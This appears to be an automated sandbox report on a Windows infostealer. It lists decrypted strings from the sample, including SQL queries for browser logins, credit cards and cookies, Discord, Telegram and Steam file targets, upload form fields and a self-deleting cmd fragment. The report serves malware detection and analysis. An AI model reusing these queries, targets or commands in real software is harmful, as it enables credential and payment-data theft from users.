                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SetEnvironmentVariableA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: LocalAlloc
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetFileSizeEx
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ReadFile
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SetFilePointer
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: WriteFile
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateFileA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FindFirstFileA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CopyFileA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: VirtualProtect
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetLogicalProcessorInformationEx
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetLastError
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: lstrcpynA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: MultiByteToWideChar
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GlobalFree
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: WideCharToMultiByte
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GlobalAlloc
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: OpenProcess
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: TerminateProcess
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetCurrentProcessId
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: gdiplus.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ole32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: bcrypt.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: wininet.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: shlwapi.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: shell32.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: psapi.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: rstrtmgr.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateCompatibleBitmap
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SelectObject
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BitBlt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DeleteObject
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateCompatibleDC
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipGetImageEncodersSize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipGetImageEncoders
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdiplusStartup
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdiplusShutdown
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipSaveImageToStream
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipDisposeImage
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GdipFree
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetHGlobalFromStream
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CreateStreamOnHGlobal
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CoUninitialize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CoInitialize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CoCreateInstance
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptGenerateSymmetricKey
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptCloseAlgorithmProvider
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptDecrypt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptSetProperty
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptDestroyKey
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: BCryptOpenAlgorithmProvider
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetWindowRect
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetDesktopWindow
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetDC
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CloseWindow
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: wsprintfA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: EnumDisplayDevicesA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetKeyboardLayoutList
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CharToOemW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: wsprintfW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegQueryValueExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegEnumKeyExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegOpenKeyExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegCloseKey
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RegEnumValueA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CryptBinaryToStringA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CryptUnprotectData
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SHGetFolderPathA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ShellExecuteExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetOpenUrlA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetConnectA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetCloseHandle
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetOpenA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HttpSendRequestA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HttpOpenRequestA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetReadFile
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: InternetCrackUrlA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrCmpCA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrStrA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: StrCmpCW
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PathMatchSpecA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: GetModuleFileNameExA
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmStartSession
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmRegisterResources
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmGetList
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: RmEndSession
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_open
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_prepare_v2
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_step
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_text
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_finalize
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_close
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_bytes
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3_column_blob
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encrypted_key
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PATH
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\ProgramData\nss3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: NSS_Init
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: NSS_Shutdown
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_GetInternalKeySlot
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_FreeSlot
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11_Authenticate
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: PK11SDR_Decrypt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\ProgramData\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Soft:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: profile:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Host:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Login:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Password:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: OperaGX
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Network
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: .txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: TRUE
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: FALSE
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Autofill
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT name, value FROM autofill
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: History
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Name:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Month:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Year:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Card:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Login Data
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Web Data
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: History
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: logins.json
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: formSubmitURL
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: usernameField
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encryptedUsername
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: encryptedPassword
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: guid
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: cookies.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: formhistory.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: places.sqlite
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Plugins
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Local Extension Settings
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Sync Extension Settings
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: IndexedDB
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera Stable
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Opera GX Stable
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: CURRENT
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: chrome-extension_
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: _0.indexeddb.leveldb
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Local State
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: profiles.ini
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: chrome
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: opera
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: firefox
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Wallets
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %08lX%04lX%lu
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ProductName
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %d/%d/%d %d:%d:%d
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ProcessorNameString
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DisplayName
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DisplayVersion
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: freebl3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: mozglue.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: msvcp140.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: nss3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: softokn3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: vcruntime140.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Temp\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: .exe
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: runas
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: open
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: /c start
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %DESKTOP%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %APPDATA%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %LOCALAPPDATA%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %USERPROFILE%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %DOCUMENTS%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %PROGRAMFILES%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %PROGRAMFILES_86%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: %RECENT%
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.lnk
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Files
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \discord\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Local Storage\leveldb\CURRENT
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Local Storage\leveldb
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Telegram Desktop\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: key_datas
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: D877F783D5D3EF8C*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: map*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: A7FDF864FBC10B77*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: A92DAA6EA6F891F2*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: F8806DD0C461824F*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Telegram
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.tox
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: *.ini
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Password
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000001
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000002
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000003
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: 00000004
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Outlook\accounts.txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Pidgin
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \.purple\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: accounts.xml
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: dQw4w9WgXcQ
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: token:
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Software\Valve\Steam
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: SteamPath
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \config\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ssfn*
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: config.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DialogConfig.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: DialogConfigOverlay*.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: libraryfolders.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: loginusers.vdf
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Steam\
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: sqlite3.dll
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: browsers
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: done
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Soft
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: \Discord\tokens.txt
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: /c timeout /t 5 & del /f /q "
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: C:\Windows\system32\cmd.exe
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: https
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: POST
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: HTTP/1.1
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: Content-Disposition: form-data; name="
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: hwid
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: build
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: token
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: file_name
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: file
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: message
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                    Source: 11.2.Hist.pif.4d20000.5.unpackString decryptor: screenshot.jpg
                    Source: mg9LPWGtPB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.5:64934 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 65.109.241.221:443 -> 192.168.2.5:64935 version: TLS 1.2
                    Source: mg9LPWGtPB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: freebl3.pdbp source: Hist.pif, 0000000B.00000002.3082181966.000000001381C000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Hist.pif, 0000000B.00000002.3094585967.000000002B5DB000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Hist.pif, 0000000B.00000002.3088383487.000000001F6FA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Hist.pif, 0000000B.00000002.3103223842.000000006C52D000.00000002.00000001.01000000.00000009.sdmp, Hist.pif, 0000000B.00000002.3085053957.000000001978A000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                    Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_000847B7 GetFileAttributesW,FindFirstFileW,FindClose,11_2_000847B7
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008C16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008C16C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CB81 FindFirstFileW,FindClose,11_2_0008CB81
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008CC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0008CC0C
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F445
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0008F5A2
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_0008F8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0008F8A3
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00083B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00083B4F
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
                    Source: C:\ProgramData\EHIJJDGDHD.exeCode function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A47B7 GetFileAttributesW,FindFirstFileW,FindClose,38_2_003A47B7
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AC16C FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AC16C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACB81 FindFirstFileW,FindClose,38_2_003ACB81
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003ACC0C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,38_2_003ACC0C
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF445 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF445
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF5A2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_003AF5A2
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003AF8A3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,38_2_003AF8A3
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3B4F FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3B4F
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003A3E72 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_003A3E72
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
